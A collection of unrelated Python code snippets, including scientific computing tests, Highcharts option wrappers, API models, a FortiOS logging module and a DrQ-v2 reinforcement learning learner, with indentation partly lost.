def test_get_and_putfield():
hdr = bytearray(_segyio.thsize())
with pytest.raises(BufferError):
_segyio.getfield('.', 0)
with pytest.raises(TypeError):
_segyio.getfield([], 0)
with pytest.raises(TypeError):
_segyio.putfield({}, 0, 1)
with pytest.raises(KeyError):
_segyio.getfield(hdr, 0)
with pytest.raises(KeyError):
_segyio.putfield(hdr, 0, 1)
_segyio.putfield(hdr, 1, 127)
_segyio.putfield(hdr, 5, 67)
_segyio.putfield(hdr, 9, 19)
assert (_segyio.getfield(hdr, 1) == 127)
assert (_segyio.getfield(hdr, 5) == 67)
assert (_segyio.getfield(hdr, 9) == 19) |
def board_remove_moderator(board: BoardModel, moderator: ModeratorModel):
with session() as s:
bm = s.query(BoardModeratorOrmModel).filter_by(board_id=board.id, moderator_id=moderator.id).one_or_none()
if (not bm):
raise ArgumentError(MESSAGE_BOARD_NOT_ADDED)
s.delete(bm)
s.commit() |
@pytest.mark.parametrize('MeshClass', [UnitIcosahedralSphereMesh, UnitCubedSphereMesh])
def test_helmholtz_mixed_sphere_lowestorder(MeshClass):
errors = [run_helmholtz_mixed_sphere(MeshClass, r, 1, 0) for r in range(2, 5)]
errors = np.asarray(errors)
l2conv = np.log2((errors[:(- 1)] / errors[1:]))
assert (l2conv > 1.7).all() |
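The assertion above checks the observed convergence order: log2 of the ratio of consecutive errors estimates the rate. A minimal self-contained sketch of that arithmetic:
import numpy as np
errors = np.asarray([1.0, 0.25, 0.0625])  # error drops 4x per refinement level
l2conv = np.log2(errors[:-1] / errors[1:])
assert (l2conv == 2.0).all()  # observed order of convergence is exactly 2 here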
class OptionPlotoptionsScatter3dStates(Options):
    @property
    def hover(self) -> 'OptionPlotoptionsScatter3dStatesHover':
        return self._config_sub_data('hover', OptionPlotoptionsScatter3dStatesHover)
    @property
    def inactive(self) -> 'OptionPlotoptionsScatter3dStatesInactive':
        return self._config_sub_data('inactive', OptionPlotoptionsScatter3dStatesInactive)
    @property
    def normal(self) -> 'OptionPlotoptionsScatter3dStatesNormal':
        return self._config_sub_data('normal', OptionPlotoptionsScatter3dStatesNormal)
    @property
    def select(self) -> 'OptionPlotoptionsScatter3dStatesSelect':
        return self._config_sub_data('select', OptionPlotoptionsScatter3dStatesSelect) |
class FaqTypeList(ResourceList):
def query(self, view_kwargs):
query_ = self.session.query(FaqType)
query_ = event_query(query_, view_kwargs)
return query_
view_kwargs = True
methods = ['GET']
schema = FaqTypeSchema
data_layer = {'session': db.session, 'model': FaqType, 'methods': {'query': query}} |
def draw_nodebox(box, name='', properties=None, node_id=None, searched_by=None, style=None):
properties = {k: v for (k, v) in (properties or {}).items() if (not (k.startswith('_') or (k == 'seq')))}
return ['nodebox', box, name, properties, (node_id or []), (searched_by or []), (style or {})] |
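For illustration, a hypothetical call (box geometry and property names invented) showing how the comprehension strips private ('_'-prefixed) and 'seq' keys before the payload list is assembled:
payload = draw_nodebox((0, 0, 10, 10), name='conv1', properties={'_cache': 1, 'seq': 2, 'label': 'v'})
assert payload[3] == {'label': 'v'}  # '_cache' and 'seq' were filtered out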
def mean_equality_hypothesis_test(sample_mean: torch.Tensor, true_mean: torch.Tensor, true_std: torch.Tensor, sample_size: torch.Tensor, p_value: int):
    """Test for the null hypothesis that the mean of a Gaussian
    distribution is within the central 1 - alpha confidence
    interval (CI) for a sample of size sample_size. We also apply an adjustment
    that takes into account that we do the test pointwise independently
    for each element of the tensor. This is basically the Dunn-Sidak
    correction.
    """
if (torch.min(sample_size) <= 0):
return False
dimensions = torch.numel(true_mean)
if (dimensions == 0):
return False
if torch.max((true_std <= 0)):
return False
adjusted_p_value = (1 - ((1 - p_value) ** (1.0 / dimensions)))
test_result = (torch.max(((torch.abs((sample_mean - true_mean)) * np.sqrt(sample_size)) / true_std)) <= inverse_normal_cdf((1 - (adjusted_p_value / 2))))
return test_result |
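The Dunn-Sidak adjustment above shrinks the per-element significance level so that testing each of the d tensor elements independently keeps the overall level near p_value. A small sketch of that arithmetic in plain Python (values are illustrative):
d = 100                                    # number of elements tested independently
p_value = 0.05
adjusted = 1 - (1 - p_value) ** (1.0 / d)  # per-element significance level
assert 0.0004 < adjusted < 0.0006          # close to, but slightly above, p_value / d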
def get_kernel(coordinate_system, field):
    kernels = {
        'cartesian': {
            'potential': kernel_potential_cartesian,
            'g_z': kernel_g_z_cartesian,
            'g_northing': kernel_g_northing_cartesian,
            'g_easting': kernel_g_easting_cartesian,
            'g_ee': kernel_g_ee_cartesian,
            'g_nn': kernel_g_nn_cartesian,
            'g_zz': kernel_g_zz_cartesian,
            'g_en': kernel_g_en_cartesian,
            'g_ez': kernel_g_ez_cartesian,
            'g_nz': kernel_g_nz_cartesian,
            'g_ne': kernel_g_en_cartesian,
            'g_ze': kernel_g_ez_cartesian,
            'g_zn': kernel_g_nz_cartesian,
        },
        'spherical': {
            'potential': kernel_potential_spherical,
            'g_z': kernel_g_z_spherical,
            'g_northing': None,
            'g_easting': None,
        },
    }
if (field not in kernels[coordinate_system]):
raise ValueError("Gravitational field '{}' not recognized".format(field))
kernel = kernels[coordinate_system][field]
if (kernel is None):
raise NotImplementedError
return kernel |
class Immutable(metaclass=ImmutableMeta):
def __new__(*args, **kwargs):
cls = args[0]
(args, kwargs) = cls._canonicalize(*args, **kwargs)
return cls._new(*args[1:], tuple(sorted(kwargs.items())))
def __reduce__(self):
return (self.__class__._new, self._args)
def __hash__(self):
return self._hash
def __eq__(self, other):
return ((self is other) or ((type(self) is type(other)) and (self._args == other._args)))
    @property
def __nutils_hash__(self):
h = hashlib.sha1('{}.{}:{}\x00'.format(type(self).__module__, type(self).__qualname__, type(self)._version).encode())
for arg in self._args:
h.update(nutils_hash(arg))
return h.digest()
def __getstate__(self):
raise Exception('getstate should never be called')
def __setstate__(self, state):
raise Exception('setstate should never be called')
def __str__(self):
(*args, kwargs) = self._args
return '{}({})'.format(self.__class__.__name__, ','.join([*map(str, args), *map('{0[0]}={0[1]}'.format, kwargs)])) |
class OptionPlotoptionsTimelineSonificationDefaultspeechoptionsMappingPitch(Options):
    @property
    def mapFunction(self):
        return self._config_get(None)
    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    @property
    def mapTo(self):
        return self._config_get('undefined')
    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    @property
    def max(self):
        return self._config_get('undefined')
    @max.setter
    def max(self, text: str):
        self._config(text, js_type=False)
    @property
    def min(self):
        return self._config_get('undefined')
    @min.setter
    def min(self, text: str):
        self._config(text, js_type=False)
    @property
    def within(self):
        return self._config_get('undefined')
    @within.setter
    def within(self, text: str):
        self._config(text, js_type=False) |
class IntVarSymbolTestCase(unittest.TestCase):
def test_add(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
var2 = IntVar(values=[1, 256], name='var_2')
sym2 = var2.symbolic_value()
imm1 = IntImm(value=37)
imm2 = IntImm(value=41)
var3 = (var1 + var2)
self.assertEqual(var3._attrs['values'], [(1 + 1), (256 + 256)])
self.assertEqual(var3.symbolic_value(), (sym1 + sym2))
var4 = (var1 + imm1)
self.assertEqual(var4._attrs['values'], [(1 + 37), (256 + 37)])
self.assertEqual(var4.symbolic_value(), (sym1 + 37))
imm3 = (imm1 + imm2)
self.assertEqual(imm3._attrs['values'], [(37 + 41)])
self.assertEqual(imm3.symbolic_value(), (37 + 41))
def test_radd(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
imm1 = IntImm(value=37)
var2 = (3 + var1)
self.assertEqual(var2._attrs['values'], [(3 + 1), (3 + 256)])
self.assertEqual(var2.symbolic_value(), (3 + sym1))
imm2 = (7 + imm1)
self.assertEqual(imm2._attrs['values'], [(7 + 37)])
self.assertEqual(imm2.symbolic_value(), (7 + 37))
def test_sub(self):
var1 = IntVar(values=[1, 512], name='var_1')
sym1 = var1.symbolic_value()
var2 = IntVar(values=[1, 256], name='var_2')
sym2 = var2.symbolic_value()
imm1 = IntImm(value=37)
imm2 = IntImm(value=31)
var3 = (var1 - var2)
self.assertEqual(var3._attrs['values'], [0, 511])
self.assertEqual(var3.symbolic_value(), (sym1 - sym2))
var4 = (var1 - imm1)
self.assertEqual(var4._attrs['values'], [0, (512 - 37)])
self.assertEqual(var4.symbolic_value(), (sym1 - 37))
imm3 = (imm1 - imm2)
self.assertEqual(imm3._attrs['values'], [(37 - 31)])
self.assertEqual(imm3.symbolic_value(), (37 - 31))
def test_rsub(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
imm1 = IntImm(value=37)
var2 = (31 - var1)
self.assertEqual(var2._attrs['values'], [0, 30])
self.assertEqual(var2.symbolic_value(), (31 - sym1))
imm2 = (47 - imm1)
self.assertEqual(imm2._attrs['values'], [(47 - 37)])
self.assertEqual(imm2.symbolic_value(), (47 - 37))
def test_mul(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
var2 = IntVar(values=[1, 256], name='var_2')
sym2 = var2.symbolic_value()
imm1 = IntImm(value=37)
imm2 = IntImm(value=41)
var3 = (var1 * var2)
self.assertEqual(var3._attrs['values'], [(1 * 1), (256 * 256)])
self.assertEqual(var3.symbolic_value(), (sym1 * sym2))
var4 = (var1 * imm1)
self.assertEqual(var4._attrs['values'], [(1 * 37), (256 * 37)])
self.assertEqual(var4.symbolic_value(), (sym1 * 37))
imm3 = (imm1 * imm2)
self.assertEqual(imm3._attrs['values'], [(37 * 41)])
self.assertEqual(imm3.symbolic_value(), (37 * 41))
def test_rmul(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
imm1 = IntImm(value=37)
var2 = (3 * var1)
self.assertEqual(var2._attrs['values'], [(3 * 1), (3 * 256)])
self.assertEqual(var2.symbolic_value(), (3 * sym1))
imm2 = (7 * imm1)
self.assertEqual(imm2._attrs['values'], [(7 * 37)])
self.assertEqual(imm2.symbolic_value(), (7 * 37))
def test_div(self):
var1 = IntVar(values=[4, 512], name='var_1')
sym1 = var1.symbolic_value()
var2 = IntVar(values=[2, 256], name='var_2')
sym2 = var2.symbolic_value()
imm1 = IntImm(value=4)
imm2 = IntImm(value=2)
var3 = (var1 / var2)
self.assertEqual(var3._attrs['values'], [0, 256])
self.assertEqual(var3.symbolic_value(), (sym1 / sym2))
var4 = (var1 / imm1)
self.assertEqual(var4._attrs['values'], [1, 128])
self.assertEqual(var4.symbolic_value(), (sym1 / 4))
imm3 = (imm1 / imm2)
self.assertEqual(imm3._attrs['values'], [2])
self.assertEqual(imm3.symbolic_value(), 2)
def test_rdiv(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
imm1 = IntImm(value=4)
var2 = (512 / var1)
self.assertEqual(var2._attrs['values'], [2, 512])
self.assertEqual(var2.symbolic_value(), (512 / sym1))
imm2 = (32 / imm1)
self.assertEqual(imm2._attrs['values'], [8])
self.assertEqual(imm2.symbolic_value(), 8) |
class TlsPrivateKeysResponse(ModelComposed):
allowed_values = {}
validations = {}
    @cached_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type)
_nullable = False
    @cached_property
def openapi_types():
lazy_import()
return {'links': (PaginationLinks,), 'meta': (PaginationMeta,), 'data': ([TlsPrivateKeyResponseData],)}
    @cached_property
def discriminator():
return None
attribute_map = {'links': 'links', 'meta': 'meta', 'data': 'data'}
read_only_vars = {}
    @classmethod
    @convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
composed_info = validate_get_composed_info(constant_args, kwargs, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
discarded_args = composed_info[3]
for (var_name, var_value) in kwargs.items():
if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
continue
setattr(self, var_name, var_value)
return self
required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes', '_composed_instances', '_var_name_to_model_instances', '_additional_properties_model_instances'])
    @convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
composed_info = validate_get_composed_info(constant_args, kwargs, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
discarded_args = composed_info[3]
for (var_name, var_value) in kwargs.items():
if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
continue
setattr(self, var_name, var_value)
if (var_name in self.read_only_vars):
raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.')
    @cached_property
def _composed_schemas():
lazy_import()
return {'anyOf': [], 'allOf': [Pagination, TlsPrivateKeysResponseAllOf], 'oneOf': []} |
@pytest.mark.xfail(strict=True)
@pytest.mark.parametrize('dfsr_filename', ['dfsr-depth-dir-down.lis.part', 'dfsr-depth-dir-up.lis.part'])
def test_depth_mode_1_direction_no_match(tmpdir, merge_lis_prs, dfsr_filename):
fpath = os.path.join(str(tmpdir), 'depth-dir-no-data-match.lis')
content = ((headers + [('data/lis/records/curves/' + dfsr_filename), 'data/lis/records/curves/fdata-depth-up-PR1.lis.part', 'data/lis/records/curves/fdata-depth-down-PR2.lis.part', 'data/lis/records/curves/fdata-depth-up-PR3.lis.part']) + trailers)
merge_lis_prs(fpath, content)
with lis.load(fpath) as (f,):
dfs = f.data_format_specs()[0]
with pytest.raises(RuntimeError) as exc:
_ = lis.curves(f, dfs)
assert ("Declared direction doesn't match actual data" in str(exc.value)) |
class OptionPlotoptionsBellcurveDatalabels(Options):
    @property
    def align(self):
        return self._config_get('center')
    @align.setter
    def align(self, text: str):
        self._config(text, js_type=False)
    @property
    def allowOverlap(self):
        return self._config_get(False)
    @allowOverlap.setter
    def allowOverlap(self, flag: bool):
        self._config(flag, js_type=False)
    @property
    def animation(self) -> 'OptionPlotoptionsBellcurveDatalabelsAnimation':
        return self._config_sub_data('animation', OptionPlotoptionsBellcurveDatalabelsAnimation)
    @property
    def backgroundColor(self):
        return self._config_get(None)
    @backgroundColor.setter
    def backgroundColor(self, text: str):
        self._config(text, js_type=False)
    @property
    def borderColor(self):
        return self._config_get(None)
    @borderColor.setter
    def borderColor(self, text: str):
        self._config(text, js_type=False)
    @property
    def borderRadius(self):
        return self._config_get(0)
    @borderRadius.setter
    def borderRadius(self, num: float):
        self._config(num, js_type=False)
    @property
    def borderWidth(self):
        return self._config_get(0)
    @borderWidth.setter
    def borderWidth(self, num: float):
        self._config(num, js_type=False)
    @property
    def className(self):
        return self._config_get(None)
    @className.setter
    def className(self, text: str):
        self._config(text, js_type=False)
    @property
    def color(self):
        return self._config_get(None)
    @color.setter
    def color(self, text: str):
        self._config(text, js_type=False)
    @property
    def crop(self):
        return self._config_get(True)
    @crop.setter
    def crop(self, flag: bool):
        self._config(flag, js_type=False)
    @property
    def defer(self):
        return self._config_get(True)
    @defer.setter
    def defer(self, flag: bool):
        self._config(flag, js_type=False)
    @property
    def enabled(self):
        return self._config_get(False)
    @enabled.setter
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
    @property
    def filter(self) -> 'OptionPlotoptionsBellcurveDatalabelsFilter':
        return self._config_sub_data('filter', OptionPlotoptionsBellcurveDatalabelsFilter)
    @property
    def format(self):
        return self._config_get('point.value')
    @format.setter
    def format(self, text: str):
        self._config(text, js_type=False)
    @property
    def formatter(self):
        return self._config_get(None)
    @formatter.setter
    def formatter(self, value: Any):
        self._config(value, js_type=False)
    @property
    def inside(self):
        return self._config_get(None)
    @inside.setter
    def inside(self, flag: bool):
        self._config(flag, js_type=False)
    @property
    def nullFormat(self):
        return self._config_get(None)
    @nullFormat.setter
    def nullFormat(self, flag: bool):
        self._config(flag, js_type=False)
    @property
    def nullFormatter(self):
        return self._config_get(None)
    @nullFormatter.setter
    def nullFormatter(self, value: Any):
        self._config(value, js_type=False)
    @property
    def overflow(self):
        return self._config_get('justify')
    @overflow.setter
    def overflow(self, text: str):
        self._config(text, js_type=False)
    @property
    def padding(self):
        return self._config_get(5)
    @padding.setter
    def padding(self, num: float):
        self._config(num, js_type=False)
    @property
    def position(self):
        return self._config_get('center')
    @position.setter
    def position(self, text: str):
        self._config(text, js_type=False)
    @property
    def rotation(self):
        return self._config_get(0)
    @rotation.setter
    def rotation(self, num: float):
        self._config(num, js_type=False)
    @property
    def shadow(self):
        return self._config_get(False)
    @shadow.setter
    def shadow(self, flag: bool):
        self._config(flag, js_type=False)
    @property
    def shape(self):
        return self._config_get('square')
    @shape.setter
    def shape(self, text: str):
        self._config(text, js_type=False)
    @property
    def style(self):
        return self._config_get(None)
    @style.setter
    def style(self, value: Any):
        self._config(value, js_type=False)
    @property
    def textPath(self) -> 'OptionPlotoptionsBellcurveDatalabelsTextpath':
        return self._config_sub_data('textPath', OptionPlotoptionsBellcurveDatalabelsTextpath)
    @property
    def useHTML(self):
        return self._config_get(False)
    @useHTML.setter
    def useHTML(self, flag: bool):
        self._config(flag, js_type=False)
    @property
    def verticalAlign(self):
        return self._config_get('bottom')
    @verticalAlign.setter
    def verticalAlign(self, text: str):
        self._config(text, js_type=False)
    @property
    def x(self):
        return self._config_get(0)
    @x.setter
    def x(self, num: float):
        self._config(num, js_type=False)
    @property
    def y(self):
        return self._config_get(0)
    @y.setter
    def y(self, num: float):
        self._config(num, js_type=False)
    @property
    def zIndex(self):
        return self._config_get(6)
    @zIndex.setter
    def zIndex(self, num: float):
        self._config(num, js_type=False) |
class Validators(Enums):
def required(self):
self._add_value()
return self
def unique(self):
self._add_value()
return self
def integer(self):
self._add_value()
return self
def float(self):
self._add_value()
return self
def numeric(self):
self._add_value()
return self
def min(self, val):
self._add_value(value=('min:%s' % val))
return self
def max(self, val):
self._add_value(value=('max:%s' % val))
return self
def maxLength(self, val):
self._add_value(value=('maxLength:%s' % val))
return self
def list(self, vals: list):
        self._add_value(value=('in:%s' % ','.join(map(str, vals))))
return self
def regex(self, val: str):
self._add_value(value=('regex:%s' % val))
return self |
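Assuming the Enums base class simply accumulates each _add_value call, returning self from every method makes the interface fluent, so rules can be chained; a hypothetical usage:
rules = Validators().required().integer().min(1).max(9999)  # hypothetical chained call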
class AccessTokenDatabase(Protocol, Generic[AP]):
async def get_by_token(self, token: str, max_age: Optional[datetime]=None) -> Optional[AP]:
...
async def create(self, create_dict: Dict[(str, Any)]) -> AP:
...
async def update(self, access_token: AP, update_dict: Dict[(str, Any)]) -> AP:
...
async def delete(self, access_token: AP) -> None:
... |
def fortios_log_syslogd3(data, fos):
fos.do_member_operation('log.syslogd3', 'setting')
if data['log_syslogd3_setting']:
resp = log_syslogd3_setting(data, fos)
else:
fos._module.fail_json(msg=('missing task body: %s' % 'log_syslogd3_setting'))
return ((not is_successful_status(resp)), (is_successful_status(resp) and (resp['revision_changed'] if ('revision_changed' in resp) else True)), resp, {}) |
class OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMapping(Options):
    @property
    def pitch(self) -> 'OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingPitch':
        return self._config_sub_data('pitch', OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingPitch)
    @property
    def playDelay(self) -> 'OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingPlaydelay':
        return self._config_sub_data('playDelay', OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingPlaydelay)
    @property
    def rate(self) -> 'OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingRate':
        return self._config_sub_data('rate', OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingRate)
    @property
    def text(self):
        return self._config_get(None)
    @text.setter
    def text(self, text: str):
        self._config(text, js_type=False)
    @property
    def time(self) -> 'OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingTime':
        return self._config_sub_data('time', OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingTime)
    @property
    def volume(self) -> 'OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingVolume':
        return self._config_sub_data('volume', OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingVolume) |
class ManageCasesTool(Tool):
def __init__(self, config: ErtConfig, notifier, ensemble_size: int):
self.notifier = notifier
self.ert_config = config
self.ensemble_size = ensemble_size
super().__init__('Manage cases', QIcon('img:build_wrench.svg'))
def trigger(self):
case_management_widget = CaseInitializationConfigurationPanel(self.ert_config, self.notifier, self.ensemble_size)
dialog = ClosableDialog('Manage cases', case_management_widget, self.parent())
dialog.setObjectName('manage-cases')
dialog.exec_() |
def disassemble(reader, data_offset_begin, data_offset_end, data_begin, data_end, code_begin, code_end):
length = file_size(reader)
call0 = {}
data_pointers = {}
code_pointers = {}
while (reader.tell() < length):
address = reader.tell()
if (data_offset_begin <= address < data_offset_end):
disassemble_data(reader, address, data_begin, data_end, code_begin, code_end, data_pointers, code_pointers)
else:
data = reader.read(1)
if (len(data) != 1):
                LOGGER.debug('Failed to read 1 byte at address 0x%x.', address)
continue
lower_8 = data[0]
if ((lower_8 & 63) == 5):
disassemble_call0(reader, address, call0)
elif (lower_8 == 102):
disassemble_bnei(reader, address, lower_8)
elif ((lower_8 & 15) == 1):
reader.read(2)
elif ((lower_8 & 15) == 4):
reader.read(1)
return (call0, data_pointers, code_pointers) |
class DrQV2Learner(core.Learner):
def __init__(self, random_key: jax_types.PRNGKey, dataset: Iterator[reverb.ReplaySample], networks: drq_v2_networks.DrQV2Networks, sigma_schedule: optax.Schedule, augmentation: augmentations.DataAugmentation, policy_optimizer: optax.GradientTransformation, critic_optimizer: optax.GradientTransformation, encoder_optimizer: optax.GradientTransformation, noise_clip: float=0.3, critic_soft_update_rate: float=0.005, discount: float=0.99, counter: Optional[counting.Counter]=None, logger: Optional[loggers.Logger]=None):
def critic_loss_fn(critic_params: networks_lib.Params, encoder_params: networks_lib.Params, critic_target_params: networks_lib.Params, policy_params: networks_lib.Params, transitions: acme_types.Transition, key: jax_types.PRNGKey, sigma: jnp.ndarray):
next_encoded = networks.encoder_network.apply(encoder_params, transitions.next_observation)
next_action = networks.policy_network.apply(policy_params, next_encoded)
next_action = networks.add_policy_noise(next_action, key, sigma, noise_clip)
(next_q1, next_q2) = networks.critic_network.apply(critic_target_params, next_encoded, next_action)
next_q = jnp.minimum(next_q1, next_q2)
target_q = (transitions.reward + ((transitions.discount * discount) * next_q))
target_q = jax.lax.stop_gradient(target_q)
encoded = networks.encoder_network.apply(encoder_params, transitions.observation)
(q1, q2) = networks.critic_network.apply(critic_params, encoded, transitions.action)
loss_critic = (jnp.square((target_q - q1)) + jnp.square((target_q - q2))).mean(axis=0)
return (loss_critic, {'q1': q1.mean(), 'q2': q2.mean()})
def policy_loss_fn(policy_params: networks_lib.Params, critic_params: networks_lib.Params, encoder_params: networks_lib.Params, observation: acme_types.Transition, sigma: jnp.ndarray, key):
encoded = networks.encoder_network.apply(encoder_params, observation)
action = networks.policy_network.apply(policy_params, encoded)
action = networks.add_policy_noise(action, key, sigma, noise_clip)
(q1, q2) = networks.critic_network.apply(critic_params, encoded, action)
q = jnp.minimum(q1, q2)
policy_loss = (- q.mean())
return (policy_loss, {})
policy_grad_fn = jax.value_and_grad(policy_loss_fn, has_aux=True)
critic_grad_fn = jax.value_and_grad(critic_loss_fn, argnums=(0, 1), has_aux=True)
def update_step(state: TrainingState, transitions: acme_types.Transition):
(key_aug1, key_aug2, key_policy, key_critic, key) = jax.random.split(state.key, 5)
sigma = sigma_schedule(state.steps)
observation_aug = augmentation(key_aug1, transitions.observation)
next_observation_aug = augmentation(key_aug2, transitions.next_observation)
transitions = transitions._replace(observation=observation_aug, next_observation=next_observation_aug)
((critic_loss, critic_aux), (critic_grad, encoder_grad)) = critic_grad_fn(state.critic_params, state.encoder_params, state.critic_target_params, state.policy_params, transitions, key_critic, sigma)
(encoder_update, encoder_opt_state) = encoder_optimizer.update(encoder_grad, state.encoder_opt_state)
(critic_update, critic_opt_state) = critic_optimizer.update(critic_grad, state.critic_opt_state)
encoder_params = optax.apply_updates(state.encoder_params, encoder_update)
critic_params = optax.apply_updates(state.critic_params, critic_update)
((policy_loss, policy_aux), actor_grad) = policy_grad_fn(state.policy_params, critic_params, encoder_params, observation_aug, sigma, key_policy)
(policy_update, policy_opt_state) = policy_optimizer.update(actor_grad, state.policy_opt_state)
policy_params = optax.apply_updates(state.policy_params, policy_update)
polyak_update_fn = partial(_soft_update, tau=critic_soft_update_rate)
critic_target_params = polyak_update_fn(state.critic_target_params, critic_params)
metrics = {'policy_loss': policy_loss, 'critic_loss': critic_loss, 'sigma': sigma, **critic_aux, **policy_aux}
new_state = TrainingState(policy_params=policy_params, policy_opt_state=policy_opt_state, encoder_params=encoder_params, encoder_opt_state=encoder_opt_state, critic_params=critic_params, critic_target_params=critic_target_params, critic_opt_state=critic_opt_state, key=key, steps=(state.steps + 1))
return (new_state, metrics)
self._iterator = dataset
self._counter = (counter or counting.Counter())
self._logger = (logger or loggers.make_default_logger(label='learner', save_data=False, asynchronous=True, serialize_fn=utils.fetch_devicearray))
self._update_step = jax.jit(update_step)
def make_initial_state(key: jax_types.PRNGKey):
(key_encoder, key_critic, key_policy, key) = jax.random.split(key, 4)
encoder_init_params = networks.encoder_network.init(key_encoder)
encoder_init_opt_state = encoder_optimizer.init(encoder_init_params)
critic_init_params = networks.critic_network.init(key_critic)
critic_init_opt_state = critic_optimizer.init(critic_init_params)
policy_init_params = networks.policy_network.init(key_policy)
policy_init_opt_state = policy_optimizer.init(policy_init_params)
return TrainingState(policy_params=policy_init_params, policy_opt_state=policy_init_opt_state, encoder_params=encoder_init_params, critic_params=critic_init_params, critic_target_params=critic_init_params, encoder_opt_state=encoder_init_opt_state, critic_opt_state=critic_init_opt_state, key=key, steps=0)
self._state = make_initial_state(random_key)
self._timestamp = None
def step(self):
sample = next(self._iterator)
transitions: acme_types.Transition = sample.data
(self._state, metrics) = self._update_step(self._state, transitions)
timestamp = time.time()
elapsed_time = ((timestamp - self._timestamp) if self._timestamp else 0)
self._timestamp = timestamp
counts = self._counter.increment(steps=1, walltime=elapsed_time)
self._logger.write({**metrics, **counts})
def get_variables(self, names):
variables = {'policy': {'encoder': self._state.encoder_params, 'policy': self._state.policy_params}}
return [variables[name] for name in names]
def save(self) -> TrainingState:
return self._state
def restore(self, state: TrainingState) -> None:
self._state = state |
def connect_fragments_ahlrichs(cdm, fragments, atoms, min_dist_scale=1.1, scale=1.2, avoid_h=False, logger=None):
atoms = [atom.lower() for atom in atoms]
if (len(fragments) > 1):
log(logger, f'Detected {len(fragments)} fragments. Generating interfragment bonds.')
dist_mat = squareform(cdm)
frag_pairs = list()
interfrag_inds = list()
max_dist = (3.0 / BOHR2ANG)
all_fragment_inds = [i for (i, _) in enumerate(fragments)]
unconnected_fragment_inds = all_fragment_inds.copy()[1:]
h_inds = set([i for (i, atom) in enumerate(atoms) if (atom.lower() == 'h')])
while True:
for (i, j) in it.product(all_fragment_inds, unconnected_fragment_inds):
if (i >= j):
continue
frag1 = fragments[i]
frag2 = fragments[j]
log(logger, f' Connecting {len(frag1)}-atom and {len(frag2)}-atom fragments.')
inds = np.array([(i1, i2) for (i1, i2) in it.product(frag1, frag2)], dtype=int)
distances = np.array([dist_mat[(k, l)] for (k, l) in inds])
frag_pairs.append((i, j))
min_ind = distances.argmin()
min_dist = distances[min_ind]
if avoid_h:
sort_inds = np.argsort(distances, kind='stable')
for (k, dist) in zip(sort_inds, distances[sort_inds]):
if (set(inds[k]) & h_inds):
continue
if (dist >= (1.5 * min_dist)):
break
min_ind = k
min_dist = distances[k]
break
if (min_dist <= max_dist):
offset = min(((min_dist_scale - 1.0) * min_dist), (1.0 / BOHR2ANG))
mask = (distances <= (min_dist + offset))
interfrag_inds.extend(inds[mask])
unconnected_fragment_inds = [k for k in unconnected_fragment_inds if (k not in (i, j))]
if (len(unconnected_fragment_inds) == 0):
break
max_dist *= scale
interfrag_inds = np.array(interfrag_inds, dtype=int)
return (interfrag_inds, list()) |
